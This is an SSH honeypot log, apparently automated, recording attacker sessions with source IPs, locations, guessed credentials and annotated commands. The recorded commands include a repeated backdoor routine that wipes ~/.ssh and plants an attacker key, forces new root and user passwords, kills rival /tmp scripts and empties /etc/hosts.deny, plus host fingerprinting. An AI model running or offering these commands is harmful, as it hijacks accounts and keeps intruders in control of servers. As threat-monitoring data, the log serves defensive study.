$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "1234\nYHYiNztT142Q\nYHYiNztT142Q"|passwd|bash
$ echo "1234\nYHYiNztT142Q\nYHYiNztT142Q\n"|passwd
$ echo -e "interview\nB96iEN6EyROD\nB96iEN6EyROD"|passwd|bash
$ echo "interview\nB96iEN6EyROD\nB96iEN6EyROD\n"|passwd
🎭 burger_root_38 (67.227.233.123) β€” Lansing, United States Β· 1 session Β· 19 cmds
2026-05-23 19:30 EDT Β· as root/!QAZXSW@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:wGII100bNrNb"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_66 (46.29.238.140) β€” Nordland, Norway Β· 2 sessions Β· 40 cmds
2026-05-23 19:05 EDT Β· as jenkins/1234, ubuntu/ubuntu@1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "1234\niDzDusVVX9Uv\niDzDusVVX9Uv"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "1234\niDzDusVVX9Uv\niDzDusVVX9Uv\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "ubuntu@1234\nru9Xa4o8anwQ\nru9Xa4o8anwQ"|passwd|bash
$ echo "ubuntu@1234\nru9Xa4o8anwQ\nru9Xa4o8anwQ\n"|passwd
🎭 wraith_root_66 (164.77.131.90) β€” Santiago, Chile Β· 1 session Β· 1 cmd
2026-05-23 19:27 EDT Β· as swissmp/Swissmp2024!!!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_root_74 (129.226.4.94) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-05-23 19:24 EDT Β· as es/es@2025
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "es@2025\nzxCpuYKvYxHM\nzxCpuYKvYxHM"|passwd|bash
$ Enter new UNIX password:
$ echo "es@2025\nzxCpuYKvYxHM\nzxCpuYKvYxHM\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 yankee_root_31 (172.214.209.153) β€” Chicago, United States Β· 1 session Β· 20 cmds
2026-05-23 19:24 EDT Β· as es/es@2025
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "es@2025\nDx4iXQM6ugfs\nDx4iXQM6ugfs"|passwd|bash
$ Enter new UNIX password:
$ echo "es@2025\nDx4iXQM6ugfs\nDx4iXQM6ugfs\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_75 (197.248.104.31) β€” Nairobi, Kenya Β· 1 session Β· 19 cmds
2026-05-23 19:19 EDT Β· as root/ABcd1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:jNgrNFRERvMN"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_19 (120.48.150.146) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-23 19:03 EDT Β· as root/asd123asd
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:DWP6FWiUwOg4"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 baguette_root_8 (51.158.120.121) β€” Paris, France Β· 2 sessions Β· 39 cmds
2026-05-21 18:54 EDT Β· as ftpuser/ftpuser2025, root/!23456Qwerty
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:d2JkwmyUCPtY"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "ftpuser2025\niwAvxqTjjQpW\niwAvxqTjjQpW"|passwd|bash
$ Enter new UNIX password:
$ echo "ftpuser2025\niwAvxqTjjQpW\niwAvxqTjjQpW\n"|passwd
🎭 wraith_root_67 (69.5.0.120) β€” Banguntapan, Indonesia Β· 1 session Β· 9 cmds
2026-05-23 19:00 EDT Β· as root/minecraft
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:NLp3dy2UYuxE"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
🎭 monsoon (36.255.66.26) β€” Kolkata, India Β· 1 session Β· 20 cmds
2026-05-23 18:57 EDT Β· as jeff/jeff
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "jeff\nRUd5L5NRH3mo\nRUd5L5NRH3mo"|passwd|bash
$ Enter new UNIX password:
$ echo "jeff\nRUd5L5NRH3mo\nRUd5L5NRH3mo\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_60 (14.225.217.138) β€” Hanoi, Vietnam Β· 2 sessions Β· 39 cmds
2026-05-23 18:23 EDT Β· as bitrix/bitrix, root/admin1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:r5pKALn0Gof2"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "bitrix\nUgUblOUspaOG\nUgUblOUspaOG"|passwd|bash
$ Enter new UNIX password:
$ echo "bitrix\nUgUblOUspaOG\nUgUblOUspaOG\n"|passwd
🎭 specter_root_67 (20.157.117.15) β€” Singapore, Singapore Β· 2 sessions Β· 39 cmds
2026-05-23 18:20 EDT Β· as bitrix/bitrix, root/admin1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "bitrix\n0ITFF27jIuSb\n0ITFF27jIuSb"|passwd|bash
$ Enter new UNIX password:
$ echo "bitrix\n0ITFF27jIuSb\n0ITFF27jIuSb\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:yuDsLJVneFPi"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 shadow_root_61 (81.192.46.36) β€” Rabat, Morocco Β· 1 session Β· 19 cmds
2026-05-23 18:33 EDT Β· as root/!23456Qwerty
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:inzFlowH76RI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_39 (137.184.228.138) β€” Santa Clara, United States Β· 4 sessions Β· 79 cmds
2026-05-23 13:50 EDT Β· as git/asdf, root/Bl123456, sambauser/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "asdf\nse6zT0gJBK8i\nse6zT0gJBK8i"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "asdf\nse6zT0gJBK8i\nse6zT0gJBK8i\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "123456\njU105Y9Wbcbq\njU105Y9Wbcbq"|passwd|bash
$ echo "123456\njU105Y9Wbcbq\njU105Y9Wbcbq\n"|passwd
$ echo -e "1234\nh2LgvcKSP8ro\nh2LgvcKSP8ro"|passwd|bash
$ echo "1234\nh2LgvcKSP8ro\nh2LgvcKSP8ro\n"|passwd
$ echo "root:QaiJja49k4Zt"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 ghost_root_15 (118.26.36.195) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 39 cmds
